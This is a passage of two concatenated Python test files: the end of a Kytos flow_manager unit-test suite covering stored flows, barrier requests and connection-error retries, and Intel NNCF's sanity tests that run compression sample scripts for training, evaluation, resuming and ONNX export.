target=self.napp.check_consistency, args=(switch,)
)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
# only a single call to check_storehouse_consistency is expected
assert check_store.call_count == 1
def test_stored_flows_by_state(self):
"""Test stored_flows_by_state method."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
stored_flow = {
"_id": "1",
"state": "installed",
"flow": {
"match": {
"ipv4_src": "192.168.2.1",
},
},
}
stored_flow2 = {
"_id": "2",
"state": "pending",
"flow": {
"match": {
"ipv4_src": "192.168.2.2",
},
},
}
self.napp.stored_flows = {dpid: {0: [stored_flow, stored_flow2]}}
filtered = self.napp.stored_flows_by_state(dpid, "installed")
assert len(filtered) == 1
self.assertDictEqual(filtered["1"], stored_flow)
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
def test_on_ofpt_flow_removed(self, mock_send_napp_event):
"""Test on_ofpt_flow_removed."""
mock = MagicMock()
mock.source.switch = "switch"
mock.message = {}
self.napp._on_ofpt_flow_removed(mock)
mock_send_napp_event.assert_called_with("switch", {}, "delete")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_del_stored_flow_by_id(self, mock_save_flow):
"""Test delete stored flow by id."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
stored_flow = {
"_id": "1",
"state": "installed",
"flow": {
"match": {
"ipv4_src": "192.168.2.1",
},
},
}
stored_flow2 = {
"_id": "2",
"state": "pending",
"flow": {
"match": {
"ipv4_src": "192.168.2.2",
},
},
}
cookie = 0
mock_save_flow.return_value = lambda x: x
self.napp.stored_flows = {dpid: {cookie: [stored_flow, stored_flow2]}}
assert len(self.napp.stored_flows[dpid][cookie]) == 2
self.napp._del_stored_flow_by_id(dpid, cookie, "1")
assert len(self.napp.stored_flows[dpid][cookie]) == 1
self.assertDictEqual(self.napp.stored_flows[dpid][cookie][0], stored_flow2)
def test_add_barrier_request(self):
"""Test add barrier request."""
dpid = "00:00:00:00:00:00:00:01"
barrier_xid = 1
flow_xid = 2
assert flow_xid not in self.napp._pending_barrier_reply[dpid]
self.napp._add_barrier_request(dpid, barrier_xid, flow_xid)
assert self.napp._pending_barrier_reply[dpid][barrier_xid] == flow_xid
def test_add_barrier_request_max_size_fifo(self):
"""Test add barrier request max size fifo popitem."""
dpid = "00:00:00:00:00:00:00:01"
max_size = 3
barrier_xid_offset = 0
flow_xid_offset = 1000
overflow = 1
self.napp._pending_barrier_max_size = max_size
assert len(self.napp._pending_barrier_reply[dpid]) == 0
for i in range(max_size + overflow):
self.napp._add_barrier_request(
dpid, barrier_xid_offset + i, flow_xid_offset + i
)
assert len(self.napp._pending_barrier_reply[dpid]) == max_size
for i in range(overflow, max_size + overflow):
assert i in self.napp._pending_barrier_reply[dpid]
for i in range(overflow):
assert i not in self.napp._pending_barrier_reply[dpid]
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_send_barrier_request(self, _):
"""Test send barrier request."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow_mod = MagicMock()
flow_mod.header.xid = 123
self.napp._send_barrier_request(switch, flow_mod)
assert (
list(self.napp._pending_barrier_reply[switch.id].values())[0]
== flow_mod.header.xid
)
@patch("napps.kytos.flow_manager.main.Main._publish_installed_flow")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_on_ofpt_barrier_reply(self, _, mock_publish):
"""Test on_ofpt barrier reply."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow_mod = MagicMock()
flow_mod.header.xid = 123
self.napp._send_barrier_request(switch, flow_mod)
assert (
list(self.napp._pending_barrier_reply[switch.id].values())[0]
== flow_mod.header.xid
)
barrier_xid = list(self.napp._pending_barrier_reply[switch.id].keys())[0]
self.napp._add_flow_mod_sent(flow_mod.header.xid, flow_mod, "add")
event = MagicMock()
event.message.header.xid = barrier_xid
assert barrier_xid
assert (
self.napp._pending_barrier_reply[switch.id][barrier_xid]
== flow_mod.header.xid
)
event.source.switch = switch
self.napp._on_ofpt_barrier_reply(event)
mock_publish.assert_called()
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_update_flow_state_store(self, mock_save_flow):
"""Test update flow state store."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
stored_flow = {
"_id": "1",
"state": "pending",
"flow": {
"match": {
"ipv4_src": "192.168.2.1",
},
},
}
stored_flow2 = {
"_id": "2",
"state": "pending",
"flow": {
"match": {
"ipv4_src": "192.168.2.2",
},
},
}
cookie = 0
mock_save_flow.return_value = lambda x: x
self.napp.stored_flows = {dpid: {cookie: [stored_flow, stored_flow2]}}
assert len(self.napp.stored_flows[dpid][cookie]) == 2
self.napp._update_flow_state_store(dpid, ["1"], "installed")
assert len(self.napp.stored_flows[dpid][cookie]) == 2
expected = dict(stored_flow)
expected["state"] = "installed"
self.assertDictEqual(self.napp.stored_flows[dpid][cookie][0], expected)
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
def test_on_openflow_connection_error(self, mock_send_napp_event):
"""Test on_openflow_connection_error."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
mock = MagicMock()
mock.event.content = {"destination": switch}
self.napp._send_openflow_connection_error(mock)
mock_send_napp_event.assert_called()
@patch("napps.kytos.flow_manager.main.Main._update_flow_state_store")
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
def test_publish_installed_flows(self, mock_send_napp_event, mock_update_flow):
"""Test publish_installed_flows."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow1 = MagicMock()
flow1.id = "1"
flow2 = MagicMock()
flow2.id = "2"
switch.flows = [flow1, flow2]
stored_flow = {
"_id": "1",
"state": "pending",
"flow": {
"match": {
"ipv4_src": "192.168.2.1",
},
},
}
stored_flow2 = {
"_id": "2",
"state": "pending",
"flow": {
"match": {
"ipv4_src": "192.168.2.2",
},
},
}
cookie = 0
self.napp.stored_flows = {dpid: {cookie: [stored_flow, stored_flow2]}}
assert len(self.napp.stored_flows[dpid][cookie]) == 2
self.napp.publish_installed_flows(switch)
assert mock_send_napp_event.call_count == 2
assert mock_update_flow.call_count == 1
@patch("napps.kytos.flow_manager.main.Main._send_barrier_request")
def test_retry_on_openflow_connection_error(self, mock_barrier):
"""Test retry on openflow connection error."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow = MagicMock()
flow.as_dict.return_value = {}
flow.xid = 1
self.napp._flow_mods_sent[flow.xid] = (flow, "add")
mock_ev = MagicMock()
mock_ev.event.content = {"destination": switch}
min_wait = 0.2
multiplier = 2
assert self.napp._retry_on_openflow_connection_error(
mock_ev,
max_retries=3,
min_wait=min_wait,
multiplier=multiplier,
send_barrier=True,
)
(count, _, wait_acc) = self.napp._flow_mods_retry_count[flow.xid]
assert count == 1
assert wait_acc == min_wait * multiplier
assert mock_barrier.call_count == 1
@patch("napps.kytos.flow_manager.main.Main._send_openflow_connection_error")
def test_retry_on_openflow_connection_error_send_event(self, mock_send):
"""Test retry on openflow connection error send event."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow = MagicMock()
flow.as_dict.return_value = {}
flow.xid = 1
self.napp._flow_mods_sent[flow.xid] = (flow, "add")
# simulate that a previous retry attempt has already been recorded (count at the limit)
self.napp._flow_mods_retry_count[flow.xid] = (3, now(), 10)
mock_ev = MagicMock()
mock_ev.event.content = {"destination": switch}
min_wait = 0.2
assert not self.napp._retry_on_openflow_connection_error(
mock_ev,
max_retries=3,
min_wait=min_wait,
multiplier=2,
send_barrier=True,
)
assert mock_send.call_count == 1
def test_retry_on_openflow_connection_error_early_return(self):
"""Test retry on openflow connection error early returns."""
max_retries = 0
min_wait = 0.2
multiplier = 2
with self.assertRaises(ValueError) as exc:
self.napp._retry_on_openflow_connection_error(
{}, max_retries, min_wait, multiplier
)
assert "should be > 0" in str(exc.exception)
self.napp._flow_mods_sent = {}
mock = MagicMock()
with self.assertRaises(ValueError) as exc:
self.napp._retry_on_openflow_connection_error(
mock, max_retries + 1, min_wait, multiplier
)
assert "not found on flow mods sent" in str(exc.exception)
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
def test_send_openflow_connection_error(self, mock_send):
"""Test _send_openflow_connection_error."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow = MagicMock()
flow.as_dict.return_value = {}
flow.xid = 1
self.napp._flow_mods_sent[flow.xid] = (flow, "add")
mock_ev = MagicMock()
mock_ev.event.content = {"destination": switch}
self.napp._send_openflow_connection_error(mock_ev)
assert mock_send.call_count == 1
def test_build_flow_mod_from_command(self):
"""Test build_flow_mod_from_command."""
mock = MagicMock()
values = [
("add", mock.as_of_add_flow_mod),
("delete", mock.as_of_delete_flow_mod),
("delete_strict", mock.as_of_strict_delete_flow_mod),
]
for command, mock_method in values:
with self.subTest(command=command, mock_method=mock_method):
self.napp.build_flow_mod_from_command(mock, command)
assert mock_method.call_count == 1
with self.assertRaises(InvalidCommandError):
self.napp.build_flow_mod_from_command(mock, "invalid_command")
|
test_sanity_sample.py
|
"""
Copyright (c) 2019-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import shlex
import signal
import subprocess
import sys
import threading
import time
from enum import Enum, auto
from pathlib import Path
from typing import Dict
import os
import pytest
import tempfile
import torch
# pylint: disable=redefined-outer-name
from examples.common.optimizer import get_default_weight_decay
from examples.common.sample_config import SampleConfig
from examples.common.utils import get_name, is_staged_quantization
from nncf.compression_method_api import CompressionLevel
from nncf.config import NNCFConfig
from nncf.quantization.layers import QuantizerConfig
from tests.conftest import EXAMPLES_DIR, PROJECT_ROOT, TEST_ROOT
class Command:
def __init__(self, cmd, path=None):
self.cmd = cmd
self.process = None
self.exec_time = -1
self.output = [] # store output here
self.kwargs = {}
self.timeout = False
self.path = path
# set system/version dependent "start_new_session" analogs
if sys.platform == "win32":
self.kwargs.update(creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
elif sys.version_info < (3, 2): # assume posix
self.kwargs.update(preexec_fn=os.setsid)
else: # Python 3.2+ and Unix
self.kwargs.update(start_new_session=True)
def kill_process_tree(self, pid):
try:
if sys.platform != "win32":
os.killpg(pid, signal.SIGKILL)
else:
subprocess.call(['taskkill', '/F', '/T', '/PID', str(pid)])
except OSError as err:
print(err)
def run(self, timeout=3600, assert_returncode_zero=True):
def target():
start_time = time.time()
self.process = subprocess.Popen(self.cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True,
bufsize=1, cwd=self.path, **self.kwargs)
self.timeout = False
self.output = []
for line in self.process.stdout:
line = line.decode('utf-8')
self.output.append(line)
sys.stdout.write(line)
sys.stdout.flush()
self.process.stdout.close()
self.process.wait()
self.exec_time = time.time() - start_time
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
try:
print("Error: process taking too long to complete--terminating" + ", [ " + self.cmd + " ]")
self.kill_process_tree(self.process.pid)
self.exec_time = timeout
self.timeout = True
thread.join()
except OSError as e:
print(self.process.pid, "Exception when try to kill task by PID, " + e.strerror)
raise
returncode = self.process.wait()
print("Process returncode = " + str(returncode))
if assert_returncode_zero:
assert returncode == 0, "Process exited with a non-zero exit code {}; output:{}".format(
returncode,
"".join(self.output))
return returncode
def get_execution_time(self):
return self.exec_time
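# Usage sketch (illustration only; mirrors how the tests below drive Command): build a shell
# command string, run it with a timeout, then read back the return code and wall-clock time.
#
#     runner = Command("python --version")
#     returncode = runner.run(timeout=60)    # asserts returncode == 0 unless told otherwise
#     elapsed = runner.get_execution_time()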
class ConfigFactory:
"""Allows to modify config file before test run"""
def __init__(self, base_config, config_path):
self.config = base_config
self.config_path = str(config_path)
def serialize(self):
with open(self.config_path, 'w') as f:
json.dump(self.config, f)
return self.config_path
def __getitem__(self, item):
return self.config[item]
def __setitem__(self, key, value):
self.config[key] = value
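# Minimal usage sketch (illustration only; not collected by pytest since the name lacks the
# "test_" prefix, and the config values here are hypothetical). It mirrors how the tests below
# use ConfigFactory: wrap a dict, override entries item-style, then serialize() the JSON file
# whose path is handed to the sample's --config argument.
def _example_config_factory_usage(tmp_path):
    factory = ConfigFactory({"model": "resnet18"}, tmp_path / "config.json")
    factory["batch_size"] = 64  # item-style override via __setitem__
    return factory.serialize()  # path of the written JSON file, usable as "--config"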
def create_command_line(args, sample_type):
python_path = PROJECT_ROOT.as_posix()
executable = EXAMPLES_DIR.joinpath(sample_type, 'main.py').as_posix()
cli_args = " ".join(key if val is None else "{} {}".format(key, val) for key, val in args.items())
return "PYTHONPATH={path} {python_exe} {main_py} {args}".format(
path=python_path, main_py=executable, args=cli_args, python_exe=sys.executable
)
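# For illustration, hypothetical args {"--mode": "test", "--multiprocessing-distributed": None}
# with sample_type "classification" yield a command of the form
#     PYTHONPATH=<project_root> <python> .../examples/classification/main.py --mode test --multiprocessing-distributed
# i.e. keys mapped to None are emitted as bare flags, which is how the tests request boolean options.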
SAMPLE_TYPES = ["classification", "semantic_segmentation", "object_detection"]
DATASETS = {
"classification": ["mock_32x32", "mock_32x32", "mock_32x32", "mock_32x32"],
"semantic_segmentation": ["camvid", "camvid"],
"object_detection": ["voc"],
}
CONFIGS = {
"classification": [TEST_ROOT.joinpath("data", "configs", "squeezenet1_1_cifar10_rb_sparsity_int8.json"),
TEST_ROOT.joinpath("data", "configs", "resnet18_cifar100_bin_xnor.json"),
TEST_ROOT.joinpath("data", "configs", "resnet18_cifar10_staged_quant.json"),
TEST_ROOT.joinpath("data", "configs", "resnet18_pruning_magnitude.json")],
"semantic_segmentation": [TEST_ROOT.joinpath("data", "configs", "unet_camvid_int8.json"),
TEST_ROOT.joinpath("data", "configs", "unet_camvid_rb_sparsity.json")],
"object_detection": [TEST_ROOT.joinpath("data", "configs", "ssd300_vgg_voc_int8.json")]
}
BATCHSIZE_PER_GPU = {
"classification": [256, 256, 256, 128],
"semantic_segmentation": [2, 2],
"object_detection": [128],
}
DATASET_PATHS = {
"classification": {
x: lambda dataset_root: dataset_root if dataset_root else os.path.join(
tempfile.gettempdir(), x) for x in DATASETS["classification"]
},
"semantic_segmentation": {
DATASETS["semantic_segmentation"][0]: lambda dataset_root: TEST_ROOT.joinpath("data", "mock_datasets",
"camvid"),
DATASETS["semantic_segmentation"][0]: lambda dataset_root: TEST_ROOT.joinpath("data", "mock_datasets", "camvid")
},
"object_detection": {
DATASETS["object_detection"][0]: lambda dataset_root: TEST_ROOT.joinpath("data", "mock_datasets", "voc")
},
}
CONFIG_PARAMS = list()
for sample_type in SAMPLE_TYPES:
for tpl in list(zip(CONFIGS[sample_type], DATASETS[sample_type], BATCHSIZE_PER_GPU[sample_type])):
CONFIG_PARAMS.append((sample_type,) + tpl)
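# Each CONFIG_PARAMS entry is a 4-tuple (sample_type, config_path, dataset_name, batch_size),
# e.g. ("classification", .../squeezenet1_1_cifar10_rb_sparsity_int8.json, "mock_32x32", 256);
# the `config` fixture below unpacks these tuples from request.param.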
def update_compression_algo_dict_with_reduced_bn_adapt_params(algo_dict):
if algo_dict["algorithm"] == "rb_sparsity":
return
if 'initializer' not in algo_dict:
algo_dict['initializer'] = {'batchnorm_adaptation': {'num_bn_adaptation_samples': 5,
'num_bn_forget_samples': 5}}
else:
algo_dict['initializer'].update({'batchnorm_adaptation': {'num_bn_adaptation_samples': 5,
'num_bn_forget_samples': 5}})
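# Sketch of the helper's intended effect (illustration only; not collected by pytest, and the
# "quantization" dict is a hypothetical algo entry): a reduced batchnorm-adaptation initializer
# is injected, while "rb_sparsity" dicts are left untouched.
def _example_reduced_bn_adapt():
    algo_dict = {"algorithm": "quantization"}
    update_compression_algo_dict_with_reduced_bn_adapt_params(algo_dict)
    # algo_dict now equals:
    # {"algorithm": "quantization",
    #  "initializer": {"batchnorm_adaptation": {"num_bn_adaptation_samples": 5,
    #                                           "num_bn_forget_samples": 5}}}
    return algo_dict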
@pytest.fixture(params=CONFIG_PARAMS,
ids=["-".join([p[0], p[1].name, p[2], str(p[3])]) for p in CONFIG_PARAMS])
def config(request, dataset_dir):
sample_type, config_path, dataset_name, batch_size = request.param
dataset_path = DATASET_PATHS[sample_type][dataset_name](dataset_dir)
with config_path.open() as f:
jconfig = json.load(f)
if "checkpoint_save_dir" in jconfig.keys():
del jconfig["checkpoint_save_dir"]
# Use a reduced number of BN adaptation samples for speed
if "compression" in jconfig:
if isinstance(jconfig["compression"], list):
algos_list = jconfig["compression"]
for algo_dict in algos_list:
update_compression_algo_dict_with_reduced_bn_adapt_params(algo_dict)
else:
algo_dict = jconfig["compression"]
update_compression_algo_dict_with_reduced_bn_adapt_params(algo_dict)
jconfig["dataset"] = dataset_name
return {
"sample_type": sample_type,
'nncf_config': jconfig,
"model_name": jconfig["model"],
"dataset_path": dataset_path,
"batch_size": batch_size,
}
@pytest.fixture(scope="module")
def case_common_dirs(tmp_path_factory):
return {
"checkpoint_save_dir": str(tmp_path_factory.mktemp("models"))
}
@pytest.mark.parametrize(" multiprocessing_distributed",
(True, False),
ids=['distributed', 'dataparallel'])
def test_pretrained_model_eval(config, tmp_path, multiprocessing_distributed):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
args = {
"--mode": "test",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--dist-url": "tcp://127.0.0.1:8987"
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
runner.run()
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(name=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(name=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_pretrained_model_train(config, tmp_path, multiprocessing_distributed, case_common_dirs):
checkpoint_save_dir = os.path.join(case_common_dirs["checkpoint_save_dir"],
"distributed" if multiprocessing_distributed else "data_parallel")
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
args = {
"--mode": "train",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--epochs": 2,
"--checkpoint-save-dir": checkpoint_save_dir,
"--dist-url": "tcp://127.0.0.1:8989"
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
runner.run()
last_checkpoint_path = os.path.join(checkpoint_save_dir, get_name(config_factory.config) + "_last.pth")
assert os.path.exists(last_checkpoint_path)
assert torch.load(last_checkpoint_path)['compression_level'] in (CompressionLevel.FULL, CompressionLevel.PARTIAL)
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(depends=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(depends=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_trained_model_eval(config, tmp_path, multiprocessing_distributed, case_common_dirs):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
ckpt_path = os.path.join(case_common_dirs["checkpoint_save_dir"],
"distributed" if multiprocessing_distributed else "data_parallel",
get_name(config_factory.config) + "_last.pth")
args = {
"--mode": "test",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--weights": ckpt_path,
"--dist-url": "tcp://127.0.0.1:8987"
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
runner.run()
def get_resuming_checkpoint_path(config_factory, multiprocessing_distributed, checkpoint_save_dir):
return os.path.join(checkpoint_save_dir,
"distributed" if multiprocessing_distributed else "data_parallel",
get_name(config_factory.config) + "_last.pth")
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(depends=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(depends=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_resume(config, tmp_path, multiprocessing_distributed, case_common_dirs):
checkpoint_save_dir = os.path.join(str(tmp_path), "models")
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
ckpt_path = get_resuming_checkpoint_path(config_factory, multiprocessing_distributed,
case_common_dirs["checkpoint_save_dir"])
if "max_iter" in config_factory.config:
config_factory.config["max_iter"] += 2
args = {
"--mode": "train",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--epochs": 3,
"--checkpoint-save-dir": checkpoint_save_dir,
"--resume": ckpt_path,
"--dist-url": "tcp://127.0.0.1:8986"
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
runner.run()
last_checkpoint_path = os.path.join(checkpoint_save_dir, get_name(config_factory.config) + "_last.pth")
assert os.path.exists(last_checkpoint_path)
assert torch.load(last_checkpoint_path)['compression_level'] in (CompressionLevel.FULL, CompressionLevel.PARTIAL)
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(depends=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(depends=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_export_with_resume(config, tmp_path, multiprocessing_distributed, case_common_dirs):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
ckpt_path = get_resuming_checkpoint_path(config_factory, multiprocessing_distributed,
case_common_dirs["checkpoint_save_dir"])
onnx_path = os.path.join(str(tmp_path), "model.onnx")
args = {
"--mode": "test",
"--config": config_factory.serialize(),
"--resume": ckpt_path,
"--to-onnx": onnx_path
}
runner = Command(create_command_line(args, config["sample_type"]))
runner.run()
assert os.path.exists(onnx_path)
def test_export_with_pretrained(tmp_path):
config = SampleConfig()
config.update({
"model": "resnet18",
"dataset": "imagenet",
"input_info": {
"sample_size": [2, 3, 299, 299]
},
"num_classes": 1000,
"compression": {"algorithm": "magnitude_sparsity"}
})
config_factory = ConfigFactory(config, tmp_path / 'config.json')
onnx_path = os.path.join(str(tmp_path), "model.onnx")
args = {
"--mode": "test",
"--config": config_factory.serialize(),
"--pretrained": '',
"--to-onnx": onnx_path
}
runner = Command(create_command_line(args, "classification"))
runner.run()
assert os.path.exists(onnx_path)
@pytest.mark.parametrize(('algo', 'ref_weight_decay'),
(('rb_sparsity', 0),
('const_sparsity', 1e-4),
('magnitude_sparsity', 1e-4),
('quantization', 1e-4)))
def test_get_default_weight_decay(algo, ref_weight_decay):
config = NNCFConfig()
config.update({"compression": {"algorithm": algo}})
assert ref_weight_decay == get_default_weight_decay(config)
def test_cpu_only_mode_produces_cpu_only_model(config, tmp_path, mocker):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
args = {
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--epochs": 1,
"--cpu-only": None
}
# Mock SafeMLFLow to prevent starting an mlflow session that is never closed; this happens
# with a mocked train function because of a memory leak of config and SafeMLFLow
mocker.patch("examples.common.utils.SafeMLFLow")
command_line = " ".join(key if val is None else "{} {}".format(key, val) for key, val in args.items())
if config["sample_type"] == "classification":
import examples.classification.main as sample
mocked_printing = mocker.patch('examples.classification.main.print_statistics')
if is_staged_quantization(config['nncf_config']):
mocker.patch("examples.classification.staged_quantization_worker.train_epoch_staged")
mocker.patch("examples.classification.staged_quantization_worker.validate")
import examples.classification.staged_quantization_worker as staged_worker
mocked_printing = mocker.patch('examples.classification.staged_quantization_worker.print_statistics')
staged_worker.validate.return_value = (0, 0)
else:
mocker.patch("examples.classification.main.train_epoch")
mocker.patch("examples.classification.main.validate")
sample.validate.return_value = (0, 0)
elif config["sample_type"] == "semantic_segmentation":
import examples.semantic_segmentation.main as sample
mocked_printing = mocker.patch('examples.semantic_segmentation.main.print_statistics')
import examples.semantic_segmentation.train
mocker.spy(examples.semantic_segmentation.train.Train, "__init__")
elif config["sample_type"] == "object_detection":
import examples.object_detection.main as sample
mocker.spy(sample, "train")
mocked_printing = mocker.patch('examples.object_detection.main.print_statistics')
sample.main(shlex.split(command_line))
if config["sample_type"] != "object_detection":
assert mocked_printing.call_count == 2
else:
assert mocked_printing.call_count == 3
# pylint: disable=no-member
if config["sample_type"] == "classification":
if is_staged_quantization(config['nncf_config']):
import examples.classification.staged_quantization_worker as staged_worker
model_to_be_trained = staged_worker.train_epoch_staged.call_args[0][2] # model
else:
model_to_be_trained = sample.train_epoch.call_args[0][1] # model
elif config["sample_type"] == "semantic_segmentation":
model_to_be_trained = examples.semantic_segmentation.train.Train.__init__.call_args[0][1] # model
elif config["sample_type"] == "object_detection":
model_to_be_trained = sample.train.call_args[0][0] # net
for p in model_to_be_trained.parameters():
assert not p.is_cuda
class SampleType(Enum):
CLASSIFICATION = auto()
SEMANTIC_SEGMENTATION = auto()
OBJECT_DETECTION = auto()
class TestCaseDescriptor:
config_name: str
quantization_algo_params: Dict = {}
sample_type: SampleType
dataset_dir: Path
dataset_name: str
is_real_dataset: bool = False
batch_size: int
n_weight_quantizers: int
n_activation_quantizers: int
def batch(self, batch_size: int):
self.batch_size = batch_size
return self
def get_config_path(self):
return TEST_ROOT.joinpath("data", "configs", "hawq", self.config_name)
def config(self, config_name: str):
self.config_name = config_name
return self
def staged(self):
self.quantization_algo_params = {
"activations_quant_start_epoch": 0
}
return self
def sample(self, sample_type: SampleType):
self.sample_type = sample_type
return self
def real_dataset(self, dataset_name: str):
self.dataset_name = dataset_name
self.is_real_dataset = True
return self
def mock_dataset(self, dataset_name: str):
self.dataset_name = dataset_name
self.dataset_dir = TEST_ROOT.joinpath("data", "mock_datasets", dataset_name)
return self
def num_weight_quantizers(self, n: int):
self.n_weight_quantizers = n
return self
def num_activation_quantizers(self, n: int):
self.n_activation_quantizers = n
return self
def __str__(self):
return '_'.join([self.config_name, 'staged' if self.quantization_algo_params else ''])
def get_config_update(self) -> Dict:
sample_params = self.get_sample_params()
return {
**sample_params,
'target_device': 'VPU',
'compression': {
'algorithm': 'quantization',
'initializer': {
'precision': self.get_precision_section(),
'range': {
"num_init_samples": 2
},
"batchnorm_adaptation": {
"num_bn_adaptation_samples": 1,
"num_bn_forget_samples": 1
}
},
'params': self.quantization_algo_params,
}
}
def get_precision_section(self) -> Dict:
raise NotImplementedError
def get_sample_params(self) -> Dict:
return {"dataset": self.dataset_name}
def setup_spy(self, mocker):
raise NotImplementedError
def validate_spy(self):
raise NotImplementedError
class HAWQDescriptor(TestCaseDescriptor):
batch_size_init: int = 0
set_chosen_config_spy = None
hessian_trace_estimator_spy = None
def batch_for_init(self, batch_size_init: int):
self.batch_size_init = batch_size_init
return self
def get_sample_params(self):
result = super().get_sample_params()
result.update({'batch_size_init': self.batch_size_init} if self.batch_size_init else {})
return result
def get_precision_section(self) -> Dict:
return {"type": "hawq",
"num_data_points": 3,
"iter_number": 1}
def __str__(self):
bs = f'_bs{self.batch_size_init}' if self.batch_size_init else ''
return super().__str__() + '_hawq' + bs
def setup_spy(self, mocker):
from nncf.quantization.init_precision import HAWQPrecisionInitializer
self.set_chosen_config_spy = mocker.spy(HAWQPrecisionInitializer, "set_chosen_config")
from nncf.quantization.hessian_trace import HessianTraceEstimator
self.hessian_trace_estimator_spy = mocker.spy(HessianTraceEstimator, "__init__")
def validate_spy(self):
bitwidth_list = self.set_chosen_config_spy.call_args[0][1]
assert len(bitwidth_list) == self.n_weight_quantizers
# with the default compression ratio of 1.5, the chosen precisions should not all equal the default bitwidth
assert set(bitwidth_list) != {QuantizerConfig().bits}
init_data_loader = self.hessian_trace_estimator_spy.call_args[0][5]
expected_batch_size = self.batch_size_init if self.batch_size_init else self.batch_size
assert init_data_loader.batch_size == expected_batch_size
class AutoQDescriptor(TestCaseDescriptor):
subset_ratio_: float = 1.0
BITS = [2, 4, 8]
def subset_ratio(self, subset_ratio_: float):
self.subset_ratio_ = subset_ratio_
return self
def get_precision_section(self) -> Dict:
return {"type": "autoq",
"bits": AutoQDescriptor.BITS,
"iter_number": 2,
"compression_ratio": 0.15,
"eval_subset_ratio": self.subset_ratio_}
def __str__(self):
sr = f'_sr{self.subset_ratio_}' if self.subset_ratio_ else ''
return super().__str__() + '_autoq' + sr
def setup_spy(self, mocker):
from nncf.nncf_network import NNCFNetwork
self.commit_compression_changes_spy = mocker.spy(NNCFNetwork, 'commit_compression_changes')
def validate_spy(self):
ctrl = self.commit_compression_changes_spy.spy_return
final_bits = [qm.num_bits for qm in ctrl.all_quantizations.values()]
assert set(final_bits) != {QuantizerConfig().bits}
